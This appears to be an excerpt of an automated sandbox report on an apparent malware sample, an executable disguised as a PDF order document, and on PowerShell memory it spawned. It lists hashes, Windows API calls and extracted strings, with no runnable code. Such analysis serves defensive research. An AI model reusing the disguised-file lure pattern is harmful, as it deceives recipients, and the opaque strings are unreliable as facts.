                                                                                                                                        • Opcode ID: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
                                                                                                                                        • Instruction ID: a47bf4f3c2a96a327e4b4819c0cefa3b0cf6e53b08830cce55d404a8342abc97
                                                                                                                                        • Opcode Fuzzy Hash: bdac3d50bedc405d14197a73e0b52ba201dc392026dc5281ea4620f547822cc0
                                                                                                                                        • Instruction Fuzzy Hash: 22E01D3350112057C6616F55EE0475977AD5F49B26F06806BF880773514774AC534FDC
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405AB9
                                                                                                                                        • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405AC7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CharPrevlstrlen
                                                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                                                        • API String ID: 2709904686-224404859
                                                                                                                                        • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                        • Instruction ID: b470c799eb173815a0b66f2a5ec0288490d136ddbfbfb3d8272f9cf217b16711
                                                                                                                                        • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                                                                                                        • Instruction Fuzzy Hash: C5D0A7635089706FE303A2108C44B9F6A48DF17300F1D4462F081A2191C6784C428BFD
                                                                                                                                        APIs
                                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                                                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BFA
                                                                                                                                        • CharNextA.USER32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C0B
                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                        • Opcode ID: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                        • Instruction ID: c18a7a17a862b3ccaab34bb7c38a9d703f10cc619688c1102a12456a902c3210
                                                                                                                                        • Opcode Fuzzy Hash: b2794e6bf21c90d62e2ecb38362cfad12420dfe545fda3f665c5114a80d4c16b
                                                                                                                                        • Instruction Fuzzy Hash: 65F0F631208914FFDB12DFA4DD40D9EBBB8EF56354B2540B9E840FB210D674EE019BA8
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2036858233.0000000004FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FD0000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_4fd0000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: e120377c23c1e32f26aa4b1a39a65c0101a0215db6b1651cd09c21aca9d56184
                                                                                                                                        • Instruction ID: 791328689a9284693c10f58346b1640727dafe652ddb0cae1644e9540133759e
                                                                                                                                        • Opcode Fuzzy Hash: e120377c23c1e32f26aa4b1a39a65c0101a0215db6b1651cd09c21aca9d56184
                                                                                                                                        • Instruction Fuzzy Hash: E8628F34B01619CFDB24DF64C8547ADBBB3EF84305F1884A9D90AAB351EB34AD86CB51
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_9410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$h2jk$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-919930682
                                                                                                                                        • Opcode ID: 3d6c1326afb65a74e3de6ad911b2f3aeed3bdcbdf472ee4e61f5303cdd31dc02
                                                                                                                                        • Instruction ID: 0b830d7f91a5470f5459031d63ad0fdcdd482613dc87bf905863097c42b5014e
                                                                                                                                        • Opcode Fuzzy Hash: 3d6c1326afb65a74e3de6ad911b2f3aeed3bdcbdf472ee4e61f5303cdd31dc02
                                                                                                                                        • Instruction Fuzzy Hash: E292BE70B042089FDB24CF68C551AAABBF2AF89315F14C06BE9059F751DB76DC81CBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2048833272.0000000009410000.00000040.00000800.00020000.00000000.sdmp, Offset: 09410000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_9410000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$84ul$84ul$84ul$84ul$tP^q$tP^q$tP^q$tP^q$$^q$$^q$$^q
                                                                                                                                        • API String ID: 0-3533978121
                                                                                                                                        • Opcode ID: 39af65782b2bbc9ca1249bd44682218f50ee0e797eafb566307a373ae2517f0b
                                                                                                                                        • Instruction ID: 33f1b8b89bea253469ca587c69ae1eca804dfd09ee38b8dfabb4376602f4b326
                                                                                                                                        • Opcode Fuzzy Hash: 39af65782b2bbc9ca1249bd44682218f50ee0e797eafb566307a373ae2517f0b
                                                                                                                                        • Instruction Fuzzy Hash: 8982C030B002099FCB159F68C855AABBBE2BF85351F1484ABE915CF391DB71DC85CBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$4tl$4tl$x.hk$x.hk$-hk
                                                                                                                                        • API String ID: 0-3394531315
                                                                                                                                        • Opcode ID: cf3f3c4e98d8e5037618093cd441a1224a9fd02bbdff78cbc1577ea0b0328505
                                                                                                                                        • Instruction ID: acc1fcda074a75e4c121e3c147e8caa6d1c6d2da3fbfdaf6812b08291a35dab4
                                                                                                                                        • Opcode Fuzzy Hash: cf3f3c4e98d8e5037618093cd441a1224a9fd02bbdff78cbc1577ea0b0328505
                                                                                                                                        • Instruction Fuzzy Hash: AE9231F0A002189FDB64DB58C951BAABBB2EB85304F5081E5D90D5F391CB72ED86CF91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-2349274253
                                                                                                                                        • Opcode ID: d727d232104cf76b3348b39d7308cfdd2bdf3bdd5ad81595a0ef95456930fab3
                                                                                                                                        • Instruction ID: 66f1aa39c9acd486fb6d5810ea8a522b291ab6ea84dbb42f45437edff92f41b3
                                                                                                                                        • Opcode Fuzzy Hash: d727d232104cf76b3348b39d7308cfdd2bdf3bdd5ad81595a0ef95456930fab3
                                                                                                                                        • Instruction Fuzzy Hash: 8F82B3B0B012259FDB14CB68C945BAABBF2EB85304F14C0E5D90D9F391CB75DD868BA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3769942141
                                                                                                                                        • Opcode ID: 1eabb9d2d9c999a0832cbc9f3bae0d71cbdd8cac2559b2331dc5cfef2b75bc00
                                                                                                                                        • Instruction ID: c845c3ed69861add3641c3fafe0927219f63f2846ca0cf145b4a12a44f7f600c
                                                                                                                                        • Opcode Fuzzy Hash: 1eabb9d2d9c999a0832cbc9f3bae0d71cbdd8cac2559b2331dc5cfef2b75bc00
                                                                                                                                        • Instruction Fuzzy Hash: 53E1D5F0A012149FDB18DB68C555B6EBBB3EF88301F10C4A5D9096F795CB71EC468BA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl$4'^q$4'^q$4'^q$4'^q
                                                                                                                                        • API String ID: 0-109293324
                                                                                                                                        • Opcode ID: 7038dbf2126a533cceff68cddaae5caf48e5dffb2c07c5d68444f5a40eef6906
                                                                                                                                        • Instruction ID: 1279779db4858688e5a3bab529690e768193176673853d7fa01d1b1446e79a8f
                                                                                                                                        • Opcode Fuzzy Hash: 7038dbf2126a533cceff68cddaae5caf48e5dffb2c07c5d68444f5a40eef6906
                                                                                                                                        • Instruction Fuzzy Hash: 53428EF0B012549FEB14CB58C545BADBBB2EF84305F2480A5E909AF795CB72ED42CB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q$tP^q$tP^q
                                                                                                                                        • API String ID: 0-445857065
                                                                                                                                        • Opcode ID: 6a9221f32b0a5b50faa4e6c1d82386516f08cb0b8acc67eb26be8e30bcdc1dbe
                                                                                                                                        • Instruction ID: 1239941ec8e186d4d888ec1e656b4036171e96e246a03d126df1ab9f7fb85a29
                                                                                                                                        • Opcode Fuzzy Hash: 6a9221f32b0a5b50faa4e6c1d82386516f08cb0b8acc67eb26be8e30bcdc1dbe
                                                                                                                                        • Instruction Fuzzy Hash: 7B3261F0B012199FEB14CB5CC555BAAB7B2EB85315F14C0A9E9099F391CB72EC42CB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$4'^q$4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3948404401
                                                                                                                                        • Opcode ID: 15cb1ec67fd63a7c5943cadfa21ce775512a31c8879e7dc860e2c245688b0eb4
                                                                                                                                        • Instruction ID: af4365f2015fd9723345b145dd0857c776b59a8dbc40077b6a9e2c373fc20653
                                                                                                                                        • Opcode Fuzzy Hash: 15cb1ec67fd63a7c5943cadfa21ce775512a31c8879e7dc860e2c245688b0eb4
                                                                                                                                        • Instruction Fuzzy Hash: 7CC1C1F0A012159FEB28DF58C541BAEBBB2EB88304F10C495D9096F795CB71EC469BA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q$4'^q$4'^q
                                                                                                                                        • API String ID: 0-1420252700
                                                                                                                                        • Opcode ID: effbc49961fa0671d0a59a3cae11f8326dd76e1d8d7f15230276f3fb4657867e
                                                                                                                                        • Instruction ID: 1555faad9ff1d3757bfaa57035554b591d0deeb9c980ac57a55b3b16544ebe34
                                                                                                                                        • Opcode Fuzzy Hash: effbc49961fa0671d0a59a3cae11f8326dd76e1d8d7f15230276f3fb4657867e
                                                                                                                                        • Instruction Fuzzy Hash: 411279F1B012258FEB259B3888156BABBA2DFC6311F1484FAD609CF251DF31C942D7A5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                                                        • API String ID: 0-1449149415
                                                                                                                                        • Opcode ID: 45bb11d3f29e7829f9a65e4e2c0595ff8e912406fdfe1388678dd642bcd293a3
                                                                                                                                        • Instruction ID: b250c0c5b2a5421e2e4db619ca845816474bfef6c5c5be4117c4507c3a92c4d9
                                                                                                                                        • Opcode Fuzzy Hash: 45bb11d3f29e7829f9a65e4e2c0595ff8e912406fdfe1388678dd642bcd293a3
                                                                                                                                        • Instruction Fuzzy Hash: 93124CF0A01229DFEB64CB14C950BAABBB2FB45304F5081E5D90D5B351CB72AD86DFA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$4'^q$4tl$x.hk
                                                                                                                                        • API String ID: 0-1449149415
                                                                                                                                        • Opcode ID: bb176911a1de02267c747e68f8804fe783305f41d21afb06e38f658b144b08da
                                                                                                                                        • Instruction ID: 85a6ff8f9eecd44b5fd97deb0c95f9bca22c01b28fc7f212e3bc1c4ace9ed7d0
                                                                                                                                        • Opcode Fuzzy Hash: bb176911a1de02267c747e68f8804fe783305f41d21afb06e38f658b144b08da
                                                                                                                                        • Instruction Fuzzy Hash: 0AE14FF0A01229DFEB64CB14C950BAABBB2FB45304F5081E5D90D6B351CB72AD86DF91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl$(fwl$(fwl
                                                                                                                                        • API String ID: 0-2555649572
                                                                                                                                        • Opcode ID: 9dfceaf3f285effa3d27fbc41b2263011e22d0f12540150d55cd7aabee4bd595
                                                                                                                                        • Instruction ID: 93b92046cebdcfce7cfb0ee132c58b2bfc0d2a2a21b3e705355b10bcff9402b0
                                                                                                                                        • Opcode Fuzzy Hash: 9dfceaf3f285effa3d27fbc41b2263011e22d0f12540150d55cd7aabee4bd595
                                                                                                                                        • Instruction Fuzzy Hash: 5B7170F0B01219DFEB24CF58C941A6ABBA2EF89311F14C0E9D8099B355CB71DD52DBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3546449468
                                                                                                                                        • Opcode ID: d8cc31aefd57692ac9fe1e54e14112bee22f5c3e431f2f4d28f26049428ddf05
                                                                                                                                        • Instruction ID: 9ade46aea05835adb296c04ab5b49f1934309aa7f07a70d780a40192ddac1290
                                                                                                                                        • Opcode Fuzzy Hash: d8cc31aefd57692ac9fe1e54e14112bee22f5c3e431f2f4d28f26049428ddf05
                                                                                                                                        • Instruction Fuzzy Hash: E6527EB0B002149FDB54CB28C955FA9BBB2EB85304F50C1D5DA0D9B395CB76ED828FA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3546449468
                                                                                                                                        • Opcode ID: 35f40ecb804fca635936601d9b201fe2f0bb7b17e25858fdc1e58318c0742801
                                                                                                                                        • Instruction ID: bd5bc0e66214611203ffc9a4967788a094fd1171e0e5997de6658973e0b28b37
                                                                                                                                        • Opcode Fuzzy Hash: 35f40ecb804fca635936601d9b201fe2f0bb7b17e25858fdc1e58318c0742801
                                                                                                                                        • Instruction Fuzzy Hash: 51422DF0B002149FDB14DB18C951FAABBB2EB89304F50C1A5DA095F391CB72ED868F91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3546449468
                                                                                                                                        • Opcode ID: 87441a06f544fa8518fde9dbb81f69e1170c2a73361695ae34111b5d32bf4a3b
                                                                                                                                        • Instruction ID: e87b569b8ddebb0b5e15f099e889c6332259e6326dd530cd905bd7823041fa04
                                                                                                                                        • Opcode Fuzzy Hash: 87441a06f544fa8518fde9dbb81f69e1170c2a73361695ae34111b5d32bf4a3b
                                                                                                                                        • Instruction Fuzzy Hash: FC2291B0A002149FDB54CB18C955FA9BBB2EB85344F50C0D5DA0DAF391CB76ED868FA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$x.hk$-hk
                                                                                                                                        • API String ID: 0-3546449468
                                                                                                                                        • Opcode ID: a89faf4710ca8fd7466eb5c4079eb8734b593c91c49b484a7557a73596b1ddd9
                                                                                                                                        • Instruction ID: 59a9be094f4a83462765ed03ccc5e84c05c1ae061c2f365be04e7afd3f02f63d
                                                                                                                                        • Opcode Fuzzy Hash: a89faf4710ca8fd7466eb5c4079eb8734b593c91c49b484a7557a73596b1ddd9
                                                                                                                                        • Instruction Fuzzy Hash: 0E121FF0B002149FDB54DB58C951FABBBB2EB85304F5081A5DA095F391CB72ED868FA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $^q$$^q$$^q
                                                                                                                                        • API String ID: 0-831282457
                                                                                                                                        • Opcode ID: b953df4f2cbacf74d913e0dcbc9e3fb8c4729acad11826bc37ee46469ccf84bc
                                                                                                                                        • Instruction ID: 59a4a338a030dae287de4f85be92991bf27a4d85425a4e6c40569872b7b17269
                                                                                                                                        • Opcode Fuzzy Hash: b953df4f2cbacf74d913e0dcbc9e3fb8c4729acad11826bc37ee46469ccf84bc
                                                                                                                                        • Instruction Fuzzy Hash: FC4139F2F012269BEB286A6D894426BB7E1EF84210B24856AC81DDF345DE31D906D7E1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q
                                                                                                                                        • API String ID: 0-2697143702
                                                                                                                                        • Opcode ID: fce8729aae71fc27d18ef80378ba6573ad27f5219d1a0e7e52fa46dd7f14a945
                                                                                                                                        • Instruction ID: 536bad15788d4e51311e9ab3d9f767ec124c9b735a3ad2b2ddf00269f8679abe
                                                                                                                                        • Opcode Fuzzy Hash: fce8729aae71fc27d18ef80378ba6573ad27f5219d1a0e7e52fa46dd7f14a945
                                                                                                                                        • Instruction Fuzzy Hash: B3126EF4B01254AFE714CB58C441F99BBB2EF85304F1580A5E909AF795CBB2ED82CB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 4'^q$4'^q
                                                                                                                                        • API String ID: 0-2697143702
                                                                                                                                        • Opcode ID: 40ca48f580ad96a4e4ffb41d6290cc8b97ff07a634bba984a73c8999eafe8b50
                                                                                                                                        • Instruction ID: ebe17fa7da100a447f86392adca6d9e3666925aa62873f23dc3a0212d9be5925
                                                                                                                                        • Opcode Fuzzy Hash: 40ca48f580ad96a4e4ffb41d6290cc8b97ff07a634bba984a73c8999eafe8b50
                                                                                                                                        • Instruction Fuzzy Hash: B1F14CF4B01218AFEB14CB58C545BA9B7B2FB84315F15C0A5E9099F391CBB2ED42CB91
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fwl$(fwl
                                                                                                                                        • API String ID: 0-2797258600
                                                                                                                                        • Opcode ID: 3a3b869234de115b2f9e01908671ef0d073daa368d46cab384d850cb77e4d4cc
                                                                                                                                        • Instruction ID: b14af528480c4e4f53d0c06dc890a6b7706dfe2051f4a978ccb88156af6c1210
                                                                                                                                        • Opcode Fuzzy Hash: 3a3b869234de115b2f9e01908671ef0d073daa368d46cab384d850cb77e4d4cc
                                                                                                                                        • Instruction Fuzzy Hash: 4B619CF0A02255DFEB24CF58C841AA9BBB2FF49310F14C1E9D809AB255C771ED52DBA1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000001.00000002.2043529868.0000000007B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B20000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_1_2_7b20000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: tP^q$tP^q
                                                                                                                                        • API String ID: 0-309238000
                                                                                                                                        • Opcode ID: 95e73edc49cb367c463e80c3eeedb83df225767d7f89bbf238e0554c0ad1ad18
                                                                                                                                        • Instruction ID: 75151be6794993c0381407aed0da750fac3c27d064991dfd8484509129344795
                                                                                                                                        • Opcode Fuzzy Hash: 95e73edc49cb367c463e80c3eeedb83df225767d7f89bbf238e0554c0ad1ad18
                                                                                                                                        • Instruction Fuzzy Hash: A7517CF1B053659FEB25AA68840472ABBA2DF86315F14C4FBE50DCF251CA71C842D3A1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
